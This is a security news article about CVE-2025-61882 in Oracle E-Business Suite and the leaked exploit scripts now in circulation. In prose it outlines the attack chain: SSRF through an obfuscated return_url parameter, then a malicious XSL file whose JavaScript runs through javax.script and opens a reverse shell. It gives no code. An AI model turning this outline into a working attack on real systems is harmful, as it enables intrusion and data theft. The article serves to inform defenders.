Leaked Oracle EBS Exploit Fuels New Attack Wave (CVE-2025-61882)

A newly disclosed and actively exploited vulnerability within Oracle’s E-Business Suite (EBS) is fueling a wave of attacks following the public leak of functional exploit scripts. Identified as CVE-2025-61882, this critical security flaw is not a single issue but rather a chain of interconnected weaknesses that, when combined, allow for complete system compromise. Security firms Resecurity and watchTowr have analyzed these leaked scripts, which are now circulating on platforms like Telegram, making sophisticated attacks accessible to a broader range of threat actors.

The origin of the leak remains uncertain, with researchers unable to confirm if the attackers were from the Cl0p or LAPSUS$ groups, other entities, or a combination thereof. The exploit requires two distinct Python scripts to function. One script, Server.py, acts as an HTTP server to host a malicious payload. The other, exp.py, is the exploit client that tricks the Oracle EBS server into contacting the attacker’s server.

The attack mechanism involves a carefully crafted HTTP request sent to the target Oracle EBS instance. This request contains a `return_url` parameter that points to the attacker’s server. To bypass basic security filters, the URL is obfuscated using numeric HTML character entities. This manipulation forces the EBS server to fetch and process content from the attacker-controlled server, constituting a server-side request forgery (SSRF) attack.

Once the EBS server follows the manipulated URL, it retrieves a malicious XSL file. This file contains an embedded JavaScript payload that is subsequently decoded and executed on the server using Java’s `javax.script` API. The final stage of the attack sees the execution of this payload, which initiates a reverse shell connection back to a listener controlled by the attacker. This provides the threat actor with interactive access to the operating system, typically running with the privileges of the Oracle user.

It is still unclear whether the initial attackers relied solely on this vulnerability or used additional flaws to breach systems. Oracle initially suggested the attacks leveraged issues patched in July 2025 but has since removed that statement from its communications. What is almost certain is that the public availability of these exploit scripts will lead to a significant increase in attacks against internet-facing Oracle EBS instances.

According to threat intelligence from Mandiant, exploitation of this vulnerability and subsequent data theft operations began in August 2025. Many victim organizations are already aware of their compromised status, having received extortion emails from the Cl0p ransomware group. However, all organizations with externally accessible Oracle EBS instances are urged to immediately check for the indicators of compromise listed in Oracle’s security advisory for CVE-2025-61882 and to apply all relevant patches and configuration fixes.

To assist defenders, watchTowr researchers have released a script that can check if an Oracle E-Business Suite instance is vulnerable to this specific flaw. Furthermore, the Cybersecurity and Infrastructure Security Agency (CISA) has officially added CVE-2025-61882 to its Known Exploited Vulnerabilities catalog, mandating federal agencies to remediate the issue promptly.

(Source: HelpNet Security)